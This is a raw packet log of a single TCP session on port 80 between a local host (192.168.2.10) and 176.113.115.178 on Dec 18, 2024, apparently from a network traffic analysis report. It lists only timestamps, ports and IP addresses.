                                                        Dec 18, 2024 14:08:23.750597000 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.750608921 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.751494884 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.751507044 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.751804113 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.752420902 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.752507925 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.752537966 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.753520966 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.753665924 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.753690004 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.754512072 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.754584074 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.754601955 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.755568027 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.755589008 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.755637884 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.756587982 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.756731987 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.756752968 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.757610083 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.757762909 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.757843018 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.758665085 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.758852005 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.759339094 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.759965897 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.760068893 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.760333061 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.760698080 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.760827065 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.760916948 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.761869907 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.761920929 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.761940002 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.762850046 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.763066053 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.763266087 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.763798952 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.763866901 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.764004946 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.764848948 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.764918089 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.764949083 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.765877962 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.765978098 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.765990973 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.767013073 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.767066956 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.767067909 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.768054008 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.768176079 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.768312931 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.769195080 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.769304991 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.769323111 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.769999027 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.770064116 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.770263910 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.771028042 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.771085024 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.771132946 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.772157907 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.772208929 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.772535086 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.773216963 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.773252964 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.773391008 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.774128914 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.774236917 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.774322987 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.775165081 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.775326967 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.775332928 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.776392937 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.776604891 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.776762962 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.777479887 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.777658939 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.777678967 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.778541088 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.778615952 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.778639078 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.779537916 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.779649019 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.779670954 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.780329943 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.780378103 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.780381918 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.781338930 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.781423092 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.781493902 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.782363892 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.782526016 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.782599926 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.783451080 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.783548117 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.783934116 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.784487963 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.784563065 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.784655094 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.785526037 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.785617113 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.785624981 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.786653996 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.786668062 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.787101030 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.787575960 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.787856102 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.806623936 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.806967974 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.807037115 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.807249069 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.807261944 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.807333946 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.808281898 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.808295012 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.808365107 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.809217930 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.849642992 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.929282904 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.929311037 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.929415941 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.929711103 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.929897070 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.930088043 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.930762053 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.930949926 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.931025028 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.931890965 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.932117939 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.932171106 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.932281971 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.933197021 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.933202982 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.933352947 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.934165001 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.934271097 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.934360981 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.935230970 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.935348988 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.935518026 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.936230898 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.936311960 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.936358929 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.937323093 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.937416077 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.937488079 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.938395023 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.938407898 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.938704967 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.939356089 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.939549923 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.940138102 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.940545082 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.940602064 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.940632105 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.941539049 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.941715956 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.941963911 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.942423105 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.942475080 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.942519903 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.943470001 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.943556070 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.943591118 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.944518089 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.944785118 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.944864035 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.945560932 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.945666075 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.945820093 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.946679115 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.946697950 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.946927071 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.947552919 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.947647095 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.947662115 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.948864937 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.949033976 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.949174881 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.949914932 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.949939013 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.949979067 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.951056957 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.951205015 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.951230049 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.951976061 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.952078104 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.952128887 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.952769995 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.952832937 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.952904940 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.953865051 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.954102993 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.954224110 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.954869032 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.954989910 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.955017090 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.956016064 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.956029892 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.956218004 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.956931114 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.957031965 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.957123995 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.957947016 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.958019018 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.958141088 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.958945036 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.959059000 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.959083080 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.960038900 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.960112095 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.960145950 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.961147070 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.961236954 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.961375952 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.962068081 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.962188005 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.962248087 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.963120937 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.963219881 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.963231087 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.964104891 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.964174032 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.964190006 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.965137005 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.965253115 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.965281010 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.966195107 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.966274023 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.966408014 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.967242956 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.967310905 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.967336893 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.968327045 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.968411922 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.968431950 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.969329119 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.969352007 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.969479084 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.970293045 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.970416069 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.970428944 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.971343040 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.971431971 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.971448898 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.972405910 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.972484112 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.972507000 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.973501921 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.973543882 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.973570108 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.974618912 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.974632025 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.974806070 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.975462914 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.975528955 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.975589037 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.976644039 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.976658106 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.976944923 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.977788925 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.977802038 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.977983952 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.978612900 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.978738070 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.978765965 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.979712963 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.979897022 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.998784065 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.998961926 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.999094009 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:23.999262094 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.999527931 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:23.999612093 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:24.000328064 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:24.000447035 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:24.000509977 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:24.001280069 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:24.052690983 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:24.121197939 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:24.121241093 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:24.121304989 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:24.121521950 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:24.121656895 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:24.121810913 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:24.122469902 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:24.122639894 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:24.122720957 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:24.123562098 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:24.123629093 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:24.123788118 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:24.124330044 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:24.124408007 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:24.124506950 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:24.125384092 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:24.125397921 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:24.125658989 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:24.126393080 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:24.126406908 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:24.126478910 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:24.127363920 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:24.127650976 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:24.127770901 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:24.128432035 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:24.128492117 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:24.128669977 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:24.129518986 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:24.129642963 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:24.129760027 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:24.130561113 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:24.130727053 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:24.130975008 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:24.131535053 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:24.131644964 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:24.131792068 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:24.132533073 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:24.132654905 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:24.132756948 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:24.133635998 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:24.133784056 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:24.133881092 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:24.134599924 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:24.134759903 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:24.134819031 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:24.135699987 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:24.135740042 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:24.136059999 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:24.136642933 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:24.136848927 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:24.136923075 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:24.137763023 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:24.137811899 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:24.137865067 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:24.138819933 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:24.138832092 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:24.138879061 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:24.139883995 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:24.140054941 CET8049746176.113.115.178192.168.2.10
